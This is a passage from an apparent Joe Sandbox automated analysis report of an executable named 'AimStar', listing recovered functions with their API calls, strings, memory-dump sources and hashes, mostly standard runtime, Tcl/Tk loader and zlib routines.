Instruction ID: f86debf643235593b7be9c14e733410fa1d33e0e6414d0b660a82ef33f0312fe
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 8F314B24E0CD4A41FA94BB249413BB9A7A99F82364FC41435DD4E873D7DE2CB54DC2B0

Function 00007FF710F59AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF710F59A9C), ref: 00007FF710F59AB1
TerminateProcess.KERNEL32(?,?,?,00007FF710F59A9C), ref: 00007FF710F59ABC
ExitProcess.KERNEL32 ref: 00007FF710F59ACB

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: 4191e2bada773a23f2639e0fa446cae3cae8cf8f730384f161f1e7b338998171
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: 2ED09E18B1CF4A52EB183B705C9B07892696F4A761F942438D80B06393ED2CB58DC330

Function 00007FF710F501AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F501F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F502E7

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 4415d54d0e9112cf570ce86f7bdd0eada1020eec1386451ce365590b03d77549
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: BA510721B0DE4286E624BA25940267AE6A9BF44BB4F944734FD6D077C5CF3CF609C620

Function 00007FF710F5C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF710F5C33D), ref: 00007FF710F5C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF710F5C33D), ref: 00007FF710F5C1FA

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: aef44f2f5366f79e8214a64a47ab3388f90d106056455035c87d1f75997280f3
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 7811016170CE8585DA10AB25A805169A765BB45BF4FA40331EE7E4B7E9CE3CE149C740

Function 00007FF710F5A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: 9d356d35a4292c25bff258481bd2a4d704451e683775d0a0097d5c893bc7919f
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: 68E08614F0CE0653FF047BB2A44717992686F84760FC44034C81D423A1EE2C799DC330

Function 00007FF710F5ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF710F5AA45,?,?,00000000,00007FF710F5AAFA), ref: 00007FF710F5AC36
GetLastError.KERNEL32(?,?,?,00007FF710F5AA45,?,?,00000000,00007FF710F5AAFA), ref: 00007FF710F5AC40

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 1048a9ef22b1386a641669696459e8910cb824b636df09723529b7f1934003eb
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 7421F621F1CF4202FB947761A49627DA6AA9F847B0F984235D91E473C1CE6CF55DC320

Function 00007FF710F5BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5BF44

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: aa72ee2592d382dd08425d545d729f8931765502da21ca7784fd98ff4e1ff4b3
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 7B41FA3290CA0587EA34EB55A442279F3B8EB55B64F900231D68E837D1CF2DF60ACB61

Function 00007FF710F47F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF710F4802A

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 9308b687cf4eea5a9f9c2c4d0625b2a01abdca647666c74d71e3793018cb6a8d
Instruction ID: 1a419967110c828ae5f09544322849f4f73aa95bdf616ce36ed783d756fdebf9
Opcode Fuzzy Hash: 9308b687cf4eea5a9f9c2c4d0625b2a01abdca647666c74d71e3793018cb6a8d
Instruction Fuzzy Hash: DB21B421B1CE9145FA10BA1665067BAD659BF45BE4FCC4430EE0D47786DE3DF14EC620

Function 00007FF710F5B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5BA32

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction ID: d256453a2c421d75ce99b316cd917a00d1563a8c4ac9bc046f766115c415cc2b
Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction Fuzzy Hash: F4316D21A1CE4685E7517B5598432BCA6B8AF40BB4FC20135EA2D133D2DF7CB64ACB31

Function 00007FF710F599D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF710F599FF

Part of subcall function 00007FF710F59AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF710F59B1D
Part of subcall function 00007FF710F59AF8: GetProcAddress.KERNEL32 ref: 00007FF710F59B33
Part of subcall function 00007FF710F59AF8: FreeLibrary.KERNEL32 ref: 00007FF710F59B5A

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: 073918279951ffc2d929893a547785c42436c6ce7f95ed6e668adfbfd36ceb8e
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction Fuzzy Hash: F6218331A0CF458AEB29AF64C4452EC77B8EB05728F840635D61D06BD5DF3CE688C760

Function 00007FF710F56004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F55F69

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 112694b0c182173f9853aebfcad77bc136b04b966ce9d1756f840c6b9624079c
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: EE115022A1CA4142EA60BF51A41617DF2B8AF45FA4FC44031EB4C97B96DF3CF648C720

Function 00007FF710F663C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F663E7

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: c1dd9f59005675640eeff9b239c71591a89f5c2ba31457f648358fb3adfbc96f
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: 3E21957661CE4186D761AF18D482379B6A4EB88B64F944234E69D477D5DF3CE408CB10

Function 00007FF710F5042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F50480

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 10718e271cad2a571baf90d70102e54687d9dab54d5bfaaffa5820a2cb728e7d
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: A401A121A0CF8141EA04EF529912069E6A9AF85FF0F884631EE5C57BD6CE3CF645C310

Function 00007FF710F5D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF710F50D00,?,?,?,00007FF710F5236A,?,?,?,?,?,00007FF710F53B59), ref: 00007FF710F5D6AA

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: cfa75f89eccb75faac08515a7a85bbc1b4cb79bb9df22fd3d2dcb95fef91f69e
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: B4F05E04B0FB0745FE647761581367892A84F557B0F884230DC2E453D2DE2CB58AC130

Non-executed Functions

Function 00007FF710F476B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF710F476C7
GetLastError.KERNEL32 ref: 00007FF710F476D9
GetProcAddress.KERNEL32 ref: 00007FF710F47715
GetLastError.KERNEL32 ref: 00007FF710F47727
GetProcAddress.KERNEL32 ref: 00007FF710F47740
GetLastError.KERNEL32 ref: 00007FF710F47752
GetProcAddress.KERNEL32 ref: 00007FF710F4776B
GetLastError.KERNEL32 ref: 00007FF710F4777D
GetProcAddress.KERNEL32 ref: 00007FF710F47799
GetLastError.KERNEL32 ref: 00007FF710F477AB
GetProcAddress.KERNEL32 ref: 00007FF710F477C7
GetLastError.KERNEL32 ref: 00007FF710F477D9
GetProcAddress.KERNEL32 ref: 00007FF710F477F5
GetLastError.KERNEL32 ref: 00007FF710F47807
GetProcAddress.KERNEL32 ref: 00007FF710F47823
GetLastError.KERNEL32 ref: 00007FF710F47835
GetProcAddress.KERNEL32 ref: 00007FF710F47851
GetLastError.KERNEL32 ref: 00007FF710F47863

Strings

Tcl_DoOneEvent, xrefs: 00007FF710F47761, 00007FF710F47783
Tcl_DeleteInterp, xrefs: 00007FF710F477EB, 00007FF710F4780D
Tcl_GetVar2, xrefs: 00007FF710F47A13, 00007FF710F47A35
Tcl_ConditionNotify, xrefs: 00007FF710F4795B, 00007FF710F4797D
Tcl_CreateObjCommand, xrefs: 00007FF710F47A6F, 00007FF710F47A91
Tk_Init, xrefs: 00007FF710F47C69, 00007FF710F47C8B
Tcl_SetVar2Ex, xrefs: 00007FF710F47B27, 00007FF710F47B49
Tcl_EvalObjv, xrefs: 00007FF710F47BDF, 00007FF710F47C01
Tcl_GetString, xrefs: 00007FF710F47A9D, 00007FF710F47ABF
Tcl_FindExecutable, xrefs: 00007FF710F47736, 00007FF710F47758
Tcl_CreateInterp, xrefs: 00007FF710F4770B, 00007FF710F4772D
Tcl_Free, xrefs: 00007FF710F47C3B, 00007FF710F47C5D
Tcl_Alloc, xrefs: 00007FF710F47C0D, 00007FF710F47C2F
Tcl_ConditionFinalize, xrefs: 00007FF710F4792D, 00007FF710F4794F
Tcl_EvalEx, xrefs: 00007FF710F47BB1, 00007FF710F47BD3
Tcl_NewByteArrayObj, xrefs: 00007FF710F47AF9, 00007FF710F47B1B
Tcl_ThreadQueueEvent, xrefs: 00007FF710F479B7, 00007FF710F479D9
Tcl_SetVar2, xrefs: 00007FF710F47A41, 00007FF710F47A63
Tcl_CreateThread, xrefs: 00007FF710F47819, 00007FF710F4783B
Tcl_GetObjResult, xrefs: 00007FF710F47B55, 00007FF710F47B77
Tk_GetNumMainWindows, xrefs: 00007FF710F47C97, 00007FF710F47CB9
Tcl_MutexUnlock, xrefs: 00007FF710F478D1, 00007FF710F478F3
Tcl_Init, xrefs: 00007FF710F476C0, 00007FF710F476DF
Tcl_NewStringObj, xrefs: 00007FF710F47ACB, 00007FF710F47AED
Tcl_Finalize, xrefs: 00007FF710F4778F, 00007FF710F477B1
Tcl_MutexLock, xrefs: 00007FF710F478A3, 00007FF710F478C5
Tcl_ConditionWait, xrefs: 00007FF710F47989, 00007FF710F479AB
Tcl_FinalizeThread, xrefs: 00007FF710F477BD, 00007FF710F477DF
Failed to get address for %hs, xrefs: 00007FF710F476E8
Tcl_MutexFinalize, xrefs: 00007FF710F478FF, 00007FF710F47921
Tcl_ThreadAlert, xrefs: 00007FF710F479E5, 00007FF710F47A07
Tcl_EvalFile, xrefs: 00007FF710F47B83, 00007FF710F47BA5
Tcl_GetCurrentThread, xrefs: 00007FF710F47847, 00007FF710F47869
GetProcAddress, xrefs: 00007FF710F476EF
Tcl_JoinThread, xrefs: 00007FF710F47875, 00007FF710F47897

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 2fc94ddd97f4e76d324f9d26f35836474d51017f45c972260123f0ae09ccbc4f
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 91029228E0DF0B91EA15BB56A8179B5A7ADBF04775BC51132D81E423A4EF3CB58CC230

Function 00007FF710F6411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF710F6416A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F647D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6494C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F64C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F64E2A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F65067
memcpy_s.LIBCPMT ref: 00007FF710F65142
memcpy_s.LIBCPMT ref: 00007FF710F651ED
memcpy_s.LIBCPMT ref: 00007FF710F652BC

Strings

1#SNAN, xrefs: 00007FF710F6427A
1#QNAN, xrefs: 00007FF710F64283
1#IND, xrefs: 00007FF710F64257
1#INF, xrefs: 00007FF710F64293

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction ID: 10237a29d663d1084e574aa32027ea75b1ba7eea8feeace9d1085da2efd95e24
Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction Fuzzy Hash: E2B20776A1C6828BE724AF24D4427FDB7AAFB54798F801135DA0D57B84DF38B908CB50

Function 00007FF710F4AD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid code lengths set, xrefs: 00007FF710F4AE9D
invalid literal/lengths set, xrefs: 00007FF710F4B1A3
invalid distance too far back, xrefs: 00007FF710F4B6E0
invalid literal/length code, xrefs: 00007FF710F4B452
invalid bit length repeat, xrefs: 00007FF710F4B109
invalid code -- missing end-of-block, xrefs: 00007FF710F4B136
too many length or distance symbols, xrefs: 00007FF710F4AEB6
invalid distance code, xrefs: 00007FF710F4B624
invalid distances set, xrefs: 00007FF710F4B210

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

